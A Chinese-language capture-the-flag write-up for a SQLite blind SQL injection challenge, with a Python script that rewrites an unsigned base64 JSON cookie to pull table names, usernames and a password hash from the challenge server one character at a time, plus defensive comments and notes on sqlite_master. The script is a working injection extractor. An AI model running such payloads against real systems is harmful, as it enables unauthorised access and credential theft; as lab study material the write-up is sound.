sqlite注入
对登录处爆破一下,得到用户名和密码 guest / guest
然后纠结了一会儿,在cookie中发现了
eyJ1c2VybmFtZSI6Imd1ZXN0IiwicGFzc3dvcmQiOiJndWVzdCJ9
这样的字符串,base64 解码后得到
{"username":"guest","password":"guest"}
cookie 只是 base64 编码的 JSON,没有任何签名,客户端可以随意修改;如果服务端把其中的字段直接拼进 SQL 语句,就会产生注入,所以猜测注入点在 cookie 处
# Writeup script for a CTF challenge instance: boolean-based blind SQL
# injection through the 1337_AUTH cookie. The cookie is plain base64-encoded
# JSON ({"username": ..., "password": ...}) with no signature or MAC, so the
# client can rewrite it at will.
# NOTE(review): the server-side query is not shown on the page; the payload
# shape suggests the username field is pasted into a double-quoted SQL string
# literal -- confirm against the application code.
# Defensive takeaways: bind cookie fields as query parameters instead of
# building SQL text from them, integrity-protect client-held state (or use a
# server-side session id), and never keep credentials in a cookie. A run like
# this shows up in logs as many requests whose decoded cookie contains SQL
# keywords (EXISTS, sqlite_master, LIKE) and changes by one character at a time.
import requests
import base64
import string

flag = ""  # prefix recovered so far
url='http://2d906c68-d6cd-4d37-9337-bd49f2852627.node3.buuoj.cn/sequels'
for i in range(50):  # at most 50 characters are recovered
    for j in string.printable:  # candidate for the next character
        tmp = flag + j
        # Disabled earlier stage, kept as a bare string literal (a no-op):
        # enumerating table names from sqlite_master. The `continue` lines
        # apparently skip the first letters of names that were already found.
        '''
        #表名
        if j == 'n':
            continue
        if j == 'r':
            continue
        if j == 's':
            continue
        payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        # table_name notes,reviews,sqlite,uSeRiNfo
        '''
        # Disabled earlier stage (also a no-op string literal): enumerating
        # the username column of userinfo.
        '''
        #username
        if j == 'g':
            continue
        payload = r'{{"username":"\" OR EXISTS(SELECT username FROM userinfo WHERE username LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        #username guest,sequeladmin
        '''
        # Active stage: the password column of userinfo. The JSON document is
        # built with the candidate prefix followed by the LIKE wildcard '%'.
        payload = r'{{"username":"\" OR EXISTS(SELECT password FROM userinfo WHERE password LIKE \"{}\") OR \"","password":"guest"}}'.format(tmp + '%')
        # Value the author recorded from this stage: f5ec3af19f0d3679e7d5a148f4ac323d
        # Re-encode the JSON exactly the way the application's own cookie is encoded.
        payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
        r = requests.get(url, cookies={"1337_AUTH" : payload})
        # "Movie" appearing in the response is used as the signal that the
        # injected condition evaluated true (presumably the normal logged-in
        # page -- not shown here).
        if "Movie" in r.text:
            flag = tmp
            print(flag)
            # Leaves only the inner loop; the outer loop moves on to the next
            # position. If no candidate matches, flag stays unchanged and the
            # same position is retried until the 50 iterations are used up.
            break
用注入得到的账号登录后就能拿到 flag
对于表(type 为 table 的记录)来说,sqlite_master 各字段的含义如下:
-- Schema of SQLite's built-in catalog table; it holds one row per table,
-- index, view or trigger in the database. The notes below describe a row
-- whose type is 'table'.
CREATE TABLE sqlite_master (
type TEXT, -- object kind; 'table' for the rows discussed here
name TEXT, -- name of the object (the table name for a table row)
tbl_name TEXT, -- table the object belongs to (same as name for a table row)
rootpage INTEGER, -- page number of the object's root b-tree page in the database file
sql TEXT -- text of the CREATE statement that defined the object
);